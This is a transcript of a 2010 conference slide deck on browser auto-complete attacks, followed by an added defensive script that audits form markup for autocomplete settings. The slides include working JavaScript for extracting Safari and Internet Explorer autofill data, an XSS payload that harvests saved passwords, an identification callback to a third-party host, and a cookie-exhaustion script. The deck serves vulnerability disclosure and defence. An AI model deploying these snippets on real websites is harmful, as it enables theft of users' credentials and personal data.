Breaking Browsers: Hacking Auto-Complete (BlackHat USA 2010)

Did you know a malicious website, laced with JavaScript malware, can steal passwords for other websites stored in Firefox’s password manager using nothing but garden-variety Cross-Site Scripting? How about JavaScript’s ability to mine out HTML form auto-complete data in Internet Explorer 6 and 7 (about one-third of the Web), which could be used to reveal a user’s first name, last name, aliases, email addresses, physical address, etc.? What about forcing Web browsers to evict all of their cookies—thereby automatically logging users out of all their current sessions, deleting tracking cookies, and so on?

Technically speaking, all of these Web hacking techniques and others are publicly documented, just not very well-known or advertised. For whatever reason they've been ignored by the browser vendors and Web security researchers. Time to bring them up to the surface.

Breaking Browsers: Hacking Auto-Complete (BlackHat USA 2010)

  1. Breaking Browsers: Hacking Auto-Complete. Jeremiah Grossman, Founder & Chief Technology Officer. Blog: http://jeremiahgrossman.blogspot.com/ Twitter: http://twitter.com/jeremiahg Email: jeremiah@whitehatsec.com. Special thanks to: Robert “RSnake” Hansen (SecTheory), Daniel Veditz (Mozilla), Microsoft Security Response Center, Mike Bailey (MAD Security), Chris Evans (Google)
  2. me. • WhiteHat Security Founder & Chief Technology Officer • 2010 RSA Security Bloggers Award (Best Corporate Blog) • InfoWorld's CTO Top 25 (2007) • 5th most popular “Jeremiah” according to Google • Brazilian Jiu-Jitsu Brown Belt • Narcissistic Vulnerability Pimp • Former Yahoo! information security officer. © 2010 WhiteHat Security, Inc.
  3. Web Security: Website Security, Browser Security. 2,000+ websites.
  4. Global Internet: 1.67 billion people, 206 million websites. http://en.wikipedia.org/wiki/Global_Internet_usage
  5. What the “bad guys” target... Largest market-share. Exploiting features enabled by default. Bonus for design flaws.
  6. Browser Version Market Share, July 2010. http://www.netmarketshare.com/browser-market-share.aspx?qprid=2
  7. By the numbers, of people: IE 8: 491 million; IE 6: 284 million; FF 3.5/3.6: 351 million; IE 7: 197 million; Chrome: 103 million; Safari 4/5: 83 million. (Also marked on the slide: 307 Mil, 36 Mil.)
  8. Security Features: Sandboxes, code security, memory protection, black-lists, green URL bars, anti-phishing, SSL warnings, etc.
  9. I know where you’ve been... (on the way out). Classic CSS History Hack:
         a:visited#link { background: url('/capture.cgi?http://bank/'); }
     Visited / Unvisited. In the “visited” pseudo-class, everything except color style properties is ignored.
         var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
     getComputedStyle lies and returns the “unvisited” link values. FF 3.7, Safari v5 nightlies.
     http://blog.mozilla.com/security/2010/03/31/plugging-the-css-history-leak/
     http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
  10. We often still know where you are logged-in, but that’s another discussion. (CSRF Login-Detection)
  11. I want to know your name, who you work for, where you live, your email address, etc. Right at the moment you visit a website. Even if you’ve never been there before, let alone entered information.
  12. (image-only slide, no text)
  13. Safari Address Book Autofill (enabled by default)
          <form>
          <input type="text" name="name">
          <input type="text" name="company">
          <input type="text" name="city">
          <input type="text" name="state">
          <input type="text" name="country">
          <input type="text" name="email">
          </form>
  14. Address Card Autofill works even when you’ve NEVER entered personal data on ANY WEBSITE.
  15. DEMO (Safari v4 / v5). Step 1) Dynamically create input fields with the pre-set attribute names. Step 2) Cycle through the alphabet initiating text events until a form value populates. Step 3) Profit! -- Steal data with JavaScript. *transparency is even more fun!*
          var event = document.createEvent('TextEvent');
          event.initTextEvent('textInput', 1, 1, null, char);
          input.value = "";
          input.selectionStart = 0;
          input.selectionEnd = 0;
          input.focus();
          input.dispatchEvent(event);

          setTimeout(function() {
            if (input.value.length > 1) {
              // capture the value;
            }
          }, 500);
  16. What about stealing other auto-fill data, data that was previously entered?
  17. Internet Explorer 8 = SAFE
  18. AutoComplete: User-supplied form values are shared across different websites by attribute “name”. For example, an email address entered into a field on website A populates the autofill for the same field name on website B, C, D, etc.
          <input type="text" name="email">
  19. DEMO - Down, Down, Enter
          // hit down arrow an incrementing number of times.
          // separate with time to allow the GUI to keep pace
          for (var i = 1; i <= downs; i++) {
            time += 30; // time padding
            keyStroke(this, 40, time); // down button
          }

          time += 15; // time padding
          keyStroke(this, 13, time); // enter button

          // initiate keystroke on a given object
          function keyStroke(obj, code, t) {
            //create new event and fire
            var e = document.createEventObject();
            e.keyCode = code;
            setTimeout(function() {obj.fireEvent("onkeydown", e); }, t);
          } // end keyStroke
      “Security Basis, and an Internet Explorer data stealer”, Andrea Giammarchi, Ajaxian Staff. http://webreflection.blogspot.com/2008/09/security-basis-and-internet-explorer.html
  20. Search terms, credit card numbers and CCVs, aliases, contact information, answers to secret questions, usernames, email addresses, ...
  21. AutoComplete is NOT enabled by default, but Internet Explorer asks the user if they would like to enable the feature after filling out a non-password form.
  22. Sometimes we can’t read auto-complete, but we can write to it (a lot)!
          <script>
          function fillAutoComp() {
            var num = Math.floor(Math.random()*1000000);
            document.getElementById('email').value = "Spoof-" + num;
            setTimeout("document.getElementById('me').submit(); fillAutoComp();",2);
          }
          </script>
          <form id="me" method="post" action="/" target="my_iframe">
          <input type="text" name="email" id="email" value="" size=140>
          <input type="button" onclick="fillAutoComp()" value="Start">
          </form>
          <iframe name="my_iframe"></iframe>
      https://bugzilla.mozilla.org/show_bug.cgi?id=578879
  23. Have the email address, but need the password
  24. Remember Password. Many Web browsers have “password managers,” which provide a convenient way to save passwords on a “per website” basis.
          <form method="post" action="/">
          E-Mail: <input type="text" name="email"><br />
          Password: <input type="password" name="pass"><br />
          <input type="submit" value="Login">
          </form>
  25. DEMO. If a website with a saved password is vulnerable to XSS, the payload can dynamically create login forms, which triggers the browser’s password auto-complete feature. Since the payload is on the same domain, the username / password can be stolen.
          function stealCreds() {
            var string = "E-Mail: " + document.getElementById("u").value;
            string += "\nPassword: " + document.getElementById("p").value;
            return string;
          }
          document.write('<form method="post" action="/">E-Mail: <input id="u" type="text" name="email" value=""><br>Password: <input id="p" type="password" name="password" value=""></form>');
          setTimeout('alert(stealCreds())', 2000);
  26. Hidden Firefox Protection: about:config, signon.autofillForms
  27. Long-term problem, even when “fixed”. Mass distribute auto-complete code (ad network), cookie affected users with a unique ID, and set up a callback Web service.
      DOMAIN: website
          <script>
          var person = {
            name: 'name',
            email: 'name',
          }
          </script>
          <script src="http://iknowyourname.com/?cb=identify">
      DOMAIN: whoisthisperson
          function identify (person) {
            ...
          }
          identify(person);
  28. Need help deleting your cookies? The user’s way...
  29. The Hacker’s Way - (Cookie Exhaustion). Firefox: Global 3,000 cookie max cap. 50 cookies can be set per hostname. Therefore, we need 1 domain with 60 subdomains.
          <script>
          for (var i = 1; i <= 60; i++) {
            img = new Image();
            // each subdomain's response sets its 50 cookies
            img.src = "http://the" + i + ".cookiemonster.com/cgi-bin/cookie.pl";
          }
          </script>
          P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT";
          Set-Cookie: cNAME_1=_cValue_1;
          Set-Cookie: cNAME_2=_cValue_2;
          Set-Cookie: cNAME_3=_cValue_3;
          ...
      https://bugzilla.mozilla.org/show_bug.cgi?id=321624
      http://kuza55.blogspot.com/2008/02/understanding-cookie-security.html
      http://www.nczonline.net/blog/2008/05/17/browser-cookie-restrictions/
  30. $300 dollar hack
  31. What to do... Disable Auto-Complete in the Web browser. Remove persistent data (History, Form Data, Cookies, LocalStorage, etc.). NoScript (Firefox Extension), 1Password, etc.
          <form autocomplete="off">
          <input type="text" autocomplete="off" />
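As an added example (not part of the slides or the speaker's material), the following script applies the autocomplete="off" guidance from the site-owner side: it scans form markup for inputs whose name matches the field names the deck shows being auto-filled or shared across sites (name, company, city, state, country, email) or whose type is password, reports those that are not opted out at either the form or the input level, and produces a hardened copy of the markup. The sample markup, the sensitive-name list and the function names parseAttrs, auditForms and hardenInputs are constructed for this example; the login form in the sample is the one from the "Remember Password" slide.

```javascript
// Added example, not from the slides: audit HTML form markup for fields that
// browser auto-complete would fill or share (the attribute names used on the
// Safari / IE slides plus password fields) and that are not opted out with
// autocomplete="off" on the <input> or its enclosing <form>.
// Field-name list, sample markup and function names are constructed for this example.

const SENSITIVE_NAMES = new Set([
  'name', 'company', 'city', 'state', 'country', 'email', 'pass', 'password',
]);

// Parse the attributes of one tag string, e.g. '<input type="text" name="email">'.
// Handles double-quoted, single-quoted and unquoted values; names are lower-cased.
function parseAttrs(tag) {
  const body = tag.replace(/^<\s*[a-zA-Z][a-zA-Z0-9]*/, '').replace(/\s*\/?>$/, '');
  const re = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  const attrs = {};
  let m;
  while ((m = re.exec(body)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : (m[4] || '');
  }
  return attrs;
}

// A field is sensitive if its name is one auto-complete shares or it is a password box.
function isSensitive(attrs) {
  const name = (attrs.name || '').toLowerCase();
  const type = (attrs.type || 'text').toLowerCase();
  return SENSITIVE_NAMES.has(name) || type === 'password';
}

function isOff(attrs) {
  return (attrs.autocomplete || '').toLowerCase() === 'off';
}

// One finding per sensitive <input> where neither the input nor its <form> opts out.
function auditForms(html) {
  const findings = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let f;
  while ((f = formRe.exec(html)) !== null) {
    const formAttrs = parseAttrs('<form' + f[1] + '>');
    const inputRe = /<input\b[^>]*>/gi;
    let i;
    while ((i = inputRe.exec(f[2])) !== null) {
      const a = parseAttrs(i[0]);
      if (isSensitive(a) && !isOff(formAttrs) && !isOff(a)) {
        findings.push({
          form: formAttrs.id || formAttrs.action || '(anonymous)',
          name: (a.name || '').toLowerCase(),
          type: (a.type || 'text').toLowerCase(),
        });
      }
    }
  }
  return findings;
}

// Hardened copy: add autocomplete="off" to every sensitive <input> that has no
// autocomplete attribute of its own (form-level attributes are left untouched).
function hardenInputs(html) {
  return html.replace(/<input\b[^>]*>/gi, (tag) => {
    const a = parseAttrs(tag);
    if (!isSensitive(a) || a.autocomplete !== undefined) return tag;
    return tag.replace(/\s*\/?>$/, (end) => ' autocomplete="off"' + end);
  });
}

// Constructed sample: the login form from the "Remember Password" slide (no opt-out),
// a signup form opted out at form level, and a contact form with one field opted out.
const SAMPLE_HTML = `
<form id="login" method="post" action="/">
  E-Mail: <input type="text" name="email"><br />
  Password: <input type="password" name="pass"><br />
  <input type="submit" value="Login">
</form>
<form id="signup" method="post" action="/signup" autocomplete="off">
  <input type="text" name="name">
  <input type="text" name="email">
</form>
<form id="contact" method="post" action="/contact">
  <input type="text" name="company" autocomplete="off" />
  <input type="text" name="comment">
</form>
`;

console.log(auditForms(SAMPLE_HTML));                 // two findings, both in form "login"
console.log(auditForms(hardenInputs(SAMPLE_HTML)));   // []
```

The audit flags the login form's email and password fields; the signup form is covered by its form-level attribute, and the hardened copy audits clean. Two caveats for anyone relying on this: the regex scanner is meant for reviewing static templates, not for parsing arbitrary HTML, and most current browsers ignore autocomplete="off" on login fields for their password managers, so for saved credentials the browser-side setting on the previous slide (signon.autofillForms) and fixing the XSS itself remain the real controls.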
  32. Questions? Jeremiah Grossman, Founder & Chief Technology Officer. Blog: http://jeremiahgrossman.blogspot.com/ Twitter: http://twitter.com/jeremiahg Email: jeremiah@whitehatsec.com
